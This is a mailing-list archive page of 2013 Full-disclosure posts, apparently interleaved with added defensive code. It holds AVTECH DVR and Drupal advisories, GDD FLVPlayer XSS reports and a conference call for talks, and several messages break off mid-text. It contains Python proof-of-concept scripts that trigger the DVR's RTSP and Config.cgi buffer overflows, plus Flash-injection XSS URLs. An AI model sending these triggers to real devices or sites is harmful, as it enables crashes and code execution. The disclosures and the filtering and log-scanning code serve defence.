ST1 empty 2.545318603515625
ST2 empty 2.1025514602661132810
ST3 empty 320326.00
ST4 empty -312.818359375
ST5 empty 0.0
ST6 empty 0.250
ST7 empty 250.9619140625000
   3 2 1 0  E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 027F  Prec NEAR,53  Mask1 1 1 1 1 1
-/


8. *Report Timeline*

. 2013-08-12:
Core attempts to contact the EPS Viewer team, no reply received.
Publication date is set for Aug 27th, 2013.

. 2013-08-20:
Core attempts to contact vendor.

. 2013-08-26:
Core attempts to contact vendor.

. 2013-08-27:
Release date missed.

. 2013-08-28:
After 3 attempts to contact vendor, the advisory CORE-2013-0808 is
published as 'user release'.


9. *References*

[1] http://epsviewer.org/.
[2] http://epsviewer.org/download.aspx.
[3]
http://www.coresecurity.com/system/files/attachments/2013/08/CORE-2013-0808-epsviewer-poc-8321106075.zip


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


11. *About Core Security Technologies*


[Full-disclosure] CORE-2013-0726 - AVTECH DVR multiple vulnerabilities

2013-08-28 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

AVTECH DVR multiple vulnerabilities


1. *Advisory Information*

Title: AVTECH DVR multiple vulnerabilities
Advisory ID: CORE-2013-0726
Advisory URL:
http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: AVTECH Corporation
Release mode: User release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper
Access Control [CWE-284]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982


3. *Vulnerability Description*

Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and
potentially other devices sharing the affected firmware) that could
allow a remote attacker:

   1. [CVE-2013-4980] To execute arbitrary code without authentication
by exploiting a buffer overflow in the RTSP packet handler.
   2. [CVE-2013-4981] To execute arbitrary code without authentication
by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a
specially crafted HTTP POST request.
   3. [CVE-2013-4982] To bypass the captcha of the administration login
console enabling several automated attack vectors.


4. *Vulnerable Packages*

   . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003.
   . Older versions are probably affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*

There was no official answer from AVTECH support team after several
attempts (see [Sec. 8]); contact vendor for further information. Some
mitigation actions may be:

   . Do not expose the DVR to internet unless absolutely necessary.
   . Have at least one proxy filtering the 'SETUP' parameter in RTSP
requests.
   . Have at least one proxy filtering the 'Network.SMTP.Receivers'
parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.


6. *Credits*

[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core
Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were
discovered and researched by Facundo Pantaleo from Core Security
Consulting Team.


7. *Technical Description / Proof of Concept Code*


7.1. *Buffer Overflow in RTSP Packet Handler*

[CVE-2013-4980] The following Python script sends a specially crafted
packet that triggers a buffer overrun condition when handling the RTSP
transaction; no authentication is required. As a result, the device
crashes and it could possibly lead to a remote code execution.

/-
import socket

HOST = '192.168.1.1'   # address of the DVR
PORT = 554             # RTSP service
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# The oversized request-URI of the SETUP request is what overruns the buffer
trigger_pkt = "SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"
print "[*] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[*] Response:', repr(data), "\r\n"
s.close()
-/


7.2. *Buffer Overflow in config.cgi Parameters*

[CVE-2013-4981] The following Python script exploits another buffer
overflow condition; no authentication is required. As a result, the
device crashes and it could possibly lead to remote code execution.


/-
import httplib

ip = "192.168.1.1"   # address of the DVR
conn = httplib.HTTPConnection(ip)
# The oversized Network.SMTP.Receivers value is not preserved in the
# archived copy of this advisory; the request is shown as archived.
conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers= HTTP/1.1")
resp = conn.getresponse()
print resp.read()
-/


7.3. *CAPTCHA Bypass*

[CVE-2013-4982] The following Python pro
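Section 5 suggests a filtering proxy for the SETUP URI and for the Network.SMTP.Receivers parameter but does not show one. The following is an added example, not code from the advisory or from AVTECH: a Python classifier for the two request shapes of sections 7.1 and 7.2, run over constructed sample traffic. The size limits MAX_RTSP_URI and MAX_SMTP_RECEIVERS are assumptions (the advisory gives no overflow sizes), the sample requests are constructed, and a length check like this is a stop-gap in front of an unpatched device, not a substitute for fixed firmware.

```python
from urllib.parse import parse_qs, urlsplit

# Assumed limits for a filtering proxy in front of the DVR; the advisory gives
# no exact overflow sizes, so set them from what legitimate clients send.
MAX_RTSP_URI = 256
MAX_SMTP_RECEIVERS = 128


def check_rtsp(raw):
    """Verdict ('allow'|'block', reason) for one raw RTSP request (bytes).
    A SETUP with an oversized request-URI has the shape of the
    CVE-2013-4980 trigger."""
    line = raw.split(b"\r\n", 1)[0]
    try:
        method, uri, version = line.decode("ascii").split(" ")
    except (UnicodeDecodeError, ValueError):
        return "block", "malformed request line"
    if not version.startswith("RTSP/"):
        return "block", "not an RTSP request line"
    if method == "SETUP" and len(uri) > MAX_RTSP_URI:
        return "block", "SETUP URI is %d bytes (limit %d)" % (len(uri), MAX_RTSP_URI)
    return "allow", ""


def check_http(method, target, body=""):
    """Verdict for an HTTP request to the DVR's web interface.  Config.cgi
    parameters may arrive in the query string (as in the advisory's PoC) or
    in a form-encoded body; an oversized Network.SMTP.Receivers value has the
    shape of the CVE-2013-4981 trigger."""
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/user/Config.cgi":
        return "allow", ""
    params = parse_qs(parts.query, keep_blank_values=True)
    if method == "POST" and body:
        for k, v in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(k, []).extend(v)
    for value in params.get("Network.SMTP.Receivers", []):
        if len(value) > MAX_SMTP_RECEIVERS:
            return "block", "Network.SMTP.Receivers is %d bytes (limit %d)" % (
                len(value), MAX_SMTP_RECEIVERS)
    return "allow", ""


# Constructed sample traffic: a normal client, the two attack shapes, and a
# request to another CGI that must pass untouched.
SAMPLE_RTSP = [
    b"DESCRIBE rtsp://192.168.1.1/live.sdp RTSP/1.0\r\nCSeq: 1\r\n\r\n",
    b"SETUP rtsp://192.168.1.1/live.sdp/track1 RTSP/1.0\r\nCSeq: 2\r\n\r\n",
    b"SETUP " + b"A" * 300 + b" RTSP/1.0\r\nCSeq: 1\r\n\r\n",
]
SAMPLE_HTTP = [
    ("GET", "/cgi-bin/user/Config.cgi?action=get&Network.SMTP.Receivers=ops@example.net", ""),
    ("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=" + "A" * 2000, ""),
    ("POST", "/cgi-bin/user/Config.cgi", "action=set&Network.SMTP.Receivers=" + "B" * 2000),
    ("GET", "/cgi-bin/user/Status.cgi?Network.SMTP.Receivers=" + "C" * 2000, ""),
]


def triage(rtsp=SAMPLE_RTSP, http=SAMPLE_HTTP):
    """Verdicts for every sample request, in order: a regression check to
    rerun whenever the limits above are tuned."""
    return [check_rtsp(r)[0] for r in rtsp] + [check_http(*h)[0] for h in http]


if __name__ == "__main__":
    for req in SAMPLE_RTSP:
        print(check_rtsp(req), req[:40])
    for req in SAMPLE_HTTP:
        print(check_http(*req), req[1][:60])
```

The RTSP check deliberately inspects only the request line and treats anything it cannot parse as a block, since the handler under attack is the one that parses exactly that line; the HTTP check merges query and body parameters because the CGI is unlikely to care which of the two the value came from.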

[Full-disclosure] 30C3 Call for Participation

2013-08-28 Thread fukami
30C3 – 30th Chaos Communication Congress
December 27th–30th 2013, CCH, Hamburg

30C3 is the 2013 edition of the Chaos Communication Congress, the
Chaos Computer Club’s international conference and hacker party.

During the four days between Christmas and New Year’s Eve, thousands
of technology enthusiasts, tinkerers, artists, utopians and  from
Europe and all over the world come together at the Congress Center
Hamburg (CCH) to exchange ideas, learn and party together.
Participants engage with topics covering information technology,
computer security, the make-and-break scene, critically constructive
ways of dealing with technology and its effects on our societies.

The lecture programme review and selection process will be put on a
new basis this year. Submitted talk proposals will be selected by
content teams in charge of one of the following tracks:
- Art & Beauty
- Ethics, Society & Politics
- Crafting & Making
- Security & Safety
- Science & Engineering.


Tracks
==

Art & Beauty

Computers can be used to create art and beauty. This track is for all
those lectures and installations dealing with creative approaches to
culture, music and art.

Crafting & Making
-
This track is about all those tools designed to turn the digital into
the physical. We are looking forward to any submissions by those who,
when they speak of cloud hacking, actually mean making it rain, who
see e-bikes as a transport layer, and who happily forward viruses from
their inbox to their DNA sequencer.

Ethics, Society & Politics
--
This track is about ethics, society and politics in the digital age.
This includes submissions dealing with the dangers of technology in
politics and society as well as the threats that politics pose for the
digital society. At the same time, aside from fear and danger, we are
interested in examples of happiness and hope for a better world
through the interaction of  technology and politics.

Science & Engineering
-
This track is for all those who don’t think Knuth was a cute polar
bear at the Berlin zoo. Submissions containing exoskeletons and
“bleeding edge” research – anything cool that comes out of
universities – as well as DIY experiments that aren’t about typical
making belong in this track. You’ve solved the halting problem?
Submit!

Security & Safety
-
This track gathers people and groups who wish to describe or discuss
technical computer related safety and security. We are interested in
everything suitable to develop or bypass security mechanisms. This is
not limited to software systems,  this year the committee is
especially interested in hardware topics. Technical weaknesses, tools,
techniques and allied research all belong in this track.

Assemblies
--
Assemblies are  places where communities of interest can meet in the
core of the congress. They are comparable to villages at the various
hacker camps. We will have lots of space again, so larger
installations will be possible. The assemblies will be organized in
the public Wiki.


Self-understanding of the 30C3
==
The CCC runs the congress with the help of self-organized volunteer
teams and on its own funds. We are proud of this and we are looking
forward to once again being able to put together a congress with no
external influences and no need for self-censorship. We regard this
event as one of the few places where a global exchange using the
creative-critical approach to technology and society is possible
without censorship.
We are not providing a stage to secret services or other state
organisations. However, based on our concept and on the fact that work
is done on a voluntary basis, a thorough advance screening of
participants and speakers is not possible.
It goes without saying that everyone attending the conference should
be treated with respect and consideration. A significant proportion of
delegates and speakers value their privacy, the integrity of their own
data and their photographic likenesses. Those who attach less
importance to personal agency in these matters are in a stronger
position. We therefore ask them to respect the feelings and wishes of
others.


Submission Guidelines
=

For talks and workshops
---
Please send us a description of your suggested talk that is as
complete as possible. The description is of particular importance to
the selection, so please ensure it is as clear as possible. Quality
takes precedence over quantity. Due to the non-commercial nature of
the Congress, presentations which aim to market or promote commercial
products or entities will not be entertained.

As it is likely that there will be multiple submissions about
the same topic, please show us exactly why your talk should be part of
the conference. Please write something about yourself, your
environment and your motivation. It does not matter if the talk has
been held at a

[Full-disclosure] [Security-news] SA-CONTRIB-2013-072 - Node View Permissions - Access Bypass

2013-08-28 Thread security-news
View online: https://drupal.org/node/2076315

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-072
  * Project: Node View Permissions [1] (third-party module)
  * Version: 7.x
  * Date: 2013-August-28
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

 DESCRIPTION  
-

The Node View Permissions module adds permissions "View own content" and
"View any content" for each content type on the permissions page.
However, it only implements hook_node_access() and not hook_query_alter(),
which means any listing of nodes does not respect the node view permission.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * Node View Permissions 7.x-1.0.

Drupal core is not affected. If you do not use the contributed Node View
Permissions [4] module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the Node View Permissions module for Drupal 7.x, upgrade to
Node View Permissions 7.x-1.2 [5]

Also see the Node View Permissions [6] project page.

 REPORTED BY  
-

  * Mark Theunissen [7]

 FIXED BY  


  * hoter [8] the module maintainer

 COORDINATED BY  
--

  * Michael Hess [9] of the Drupal Security Team
  * Mark Ferree [10] provisional member of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/node_view_permissions
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/node_view_permissions
[5] https://drupal.org/node/2031621
[6] http://drupal.org/project/node_view_permissions
[7] https://drupal.org/user/108606
[8] http://drupal.org/user/1677790
[9] https://drupal.org/user/102818
[10] http://drupal.org/user/76245
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news

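The gap the advisory describes is the missing listing-level check. The following is an added illustration for Drupal 7, not code from the Node View Permissions module or its 7.x-1.2 fix: a hook_query_TAG_alter() implementation for the node_access tag that narrows tagged listing queries to the content types the current user may view. The permission names "view any/own TYPE content" and the module machine name nvp_listing are assumed.

```php
<?php
// Added illustration, not the module's own code or its 7.x-1.2 fix; the permission
// names "view any/own TYPE content" and module name "nvp_listing" are assumed.
// Implements hook_query_TAG_alter() for the "node_access" tag: hook_node_access()
// only guards single-node checks, while listings (Views, search, taxonomy pages)
// run a query tagged "node_access", so the per-type permission is enforced here.
function nvp_listing_query_node_access_alter(QueryAlterableInterface $query) {
  global $user;
  // Mirror core: users who bypass node access see everything.
  if (user_access('bypass node access')) {
    return;
  }
  // Locate the alias of the {node} base table in this query.
  $alias = NULL;
  foreach ($query->getTables() as $table) {
    if (is_string($table['table']) && $table['table'] == 'node') {
      $alias = $table['alias'];
      break;
    }
  }
  if ($alias === NULL) {
    return;
  }
  // Sort content types by what the user may list: any node, or only own.
  $any = $own = array();
  foreach (array_keys(node_type_get_types()) as $type) {
    if (user_access("view any $type content")) {
      $any[] = $type;
    }
    elseif (user_access("view own $type content")) {
      $own[] = $type;
    }
  }
  // No permission on any type: the listing must return no rows at all.
  if (!$any && !$own) {
    $query->where('1 = 0');
    return;
  }
  // WHERE (type IN $any) OR (type IN $own AND uid = current user).
  $or = db_or();
  if ($any) {
    $or->condition("$alias.type", $any, 'IN');
  }
  if ($own) {
    $or->condition(db_and()->condition("$alias.type", $own, 'IN')
                           ->condition("$alias.uid", $user->uid));
  }
  $query->condition($or);
}
```

Only queries that carry the node_access tag are altered, so a custom db_select() that omits addTag('node_access') still bypasses this check, which is the same caveat core's own node access grants carry.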


[Full-disclosure] [Security-news] SA-CONTRIB-2013-071 - Flag - Cross Site Scripting

2013-08-28 Thread security-news
View online: https://drupal.org/node/2076221

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-071
  * Project: Flag [1] (third-party module)
  * Version: 7.x
  * Date: 2013-August-28
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
--------------

The Flag module allows creation of customizable flags on entities.

Flag does not properly sanitize the name of a flag on the main flag
administration page, allowing a malicious user to embed scripts within a
page, resulting in a Cross-site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker must have the
'Administer flags' permission.


 CVE IDENTIFIER(S) ISSUED  
---------------------------

  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
--------------------

  * Flag 7.x-3.x versions prior to 7.x-3.0.

Drupal core is not affected. If you do not use the contributed Flag [4]
module, there is nothing you need to do.

 SOLUTION  
-----------

Install the latest version:

  * If you use the Flag module for Drupal 7.x, upgrade to Flag 7.x-3.1 [5]

Also see the Flag [6] project page.

 REPORTED BY  
--------------

  * Justin_KleinKeane [7]

 FIXED BY  
-----------

  * Justin_KleinKeane [8]
  * Joachim Noreiko [9] the module co-maintainer

 COORDINATED BY  
-----------------

  * Greg Knaddison [10] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  
-------------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/flag
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/flag
[5] https://drupal.org/node/2075287
[6] http://drupal.org/project/flag
[7] http://drupal.org/user/302225
[8] http://drupal.org/user/302225
[9] http://drupal.org/user/107701
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration



[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with GDD FLVPlayer

2013-08-28 Thread MustLive

Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in 
multiple web applications with GDD FLVPlayer. Earlier I wrote about 
vulnerabilities in GDD FLVPlayer 
(http://seclists.org/fulldisclosure/2013/Aug/247). This is a video and audio 
player, which is used at thousands of web sites and in multiple web 
applications.


Among them are the following themes for WordPress: I Love It (I wrote about it 
earlier: http://seclists.org/fulldisclosure/2013/Jul/116), Megusta, 
Multipress, Lolzine, V1. This flash video and audio player is also used as a 
standalone web application in many custom themes and in different CMS 
(WordPress, Joomla) in non-theme folders.


------------------
Affected products:
------------------

Vulnerable are web applications which use GDD FLVPlayer v3.635 and 
previous versions.


Vulnerable are all versions of the following web applications: I Love It, 
Megusta, Multipress, Lolzine, V1.


-----------------
Affected vendors:
-----------------

GDD FLVPlayer was developed by GeDeDe.

GeDeDe
http://www.gdd.ro

--------
Details:
--------

XSS (via Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and 
others), which is typical for WP themes.


http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

In the last theme the path can be v1, v1.0, v1.3.5 and other variants. At 
some web sites Jplayer (about whose multiple vulnerabilities I wrote 
earlier) is used instead of GDD FLVPlayer.


These are examples of XSS and FPD vulnerabilities; for examples of the 8 CS 
vulnerabilities see the above-mentioned advisory.


I mentioned these vulnerabilities at my site 
(http://websecurity.com.ua/6731/).


Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



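As an added example that is not part of the original post: a PHP scan over web-server access-log lines that flags requests handing GDD FLVPlayer's mylogo or splashscreen parameter a .swf or an absolute URL, the injection pattern listed above. The log lines are constructed; the path is the I Love It theme path from the post.

```php
<?php
// Added example, not from the original post: scan access-log lines for
// requests that point GDD FLVPlayer's "mylogo" or "splashscreen" parameter at
// another .swf or at an absolute URL. The log lines below are constructed.

/**
 * Returns suspicious requests found in $lines (Common Log Format), each as
 * array(client IP, requested path, parameter name, parameter value).
 */
function find_flvplayer_injections(array $lines) {
  $hits = array();
  foreach ($lines as $line) {
    // IP ident user [date] "METHOD /path?query HTTP/x.y" status bytes
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"/', $line, $m)) {
      continue;
    }
    $parts = parse_url($m[2]);
    if (empty($parts['path']) || stripos($parts['path'], 'gddflvplayer.swf') === FALSE) {
      continue;
    }
    $params = array();
    parse_str(isset($parts['query']) ? $parts['query'] : '', $params);
    foreach (array('mylogo', 'splashscreen') as $name) {
      if (!isset($params[$name])) {
        continue;
      }
      $value = $params[$name];
      // The player should only be handed its own image assets; a .swf or any
      // absolute URL in these parameters is the injection pattern to alert on.
      if (preg_match('/\.swf(\?|$)/i', $value) || preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
        $hits[] = array($m[1], $parts['path'], $name, $value);
      }
    }
  }
  return $hits;
}

// Constructed sample: one injection attempt, one legitimate player load, one
// unrelated request.
$sample = array(
  '203.0.113.5 - - [28/Aug/2013:10:00:01 +0000] "GET /wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=http://203.0.113.9/x.swf HTTP/1.1" 200 512',
  '198.51.100.7 - - [28/Aug/2013:10:00:02 +0000] "GET /wp-content/themes/iloveit/flv/gddflvplayer.swf?file=intro.flv&mylogo=logo.png HTTP/1.1" 200 512',
  '198.51.100.8 - - [28/Aug/2013:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 1024',
);
foreach (find_flvplayer_injections($sample) as $hit) {
  printf("ALERT %s requested %s with %s=%s\n", $hit[0], $hit[1], $hit[2], $hit[3]);
}
```

Only the first sample line is reported; a site that has removed or patched the player can use the same scan to confirm nothing still requests the old gddflvplayer.swf path.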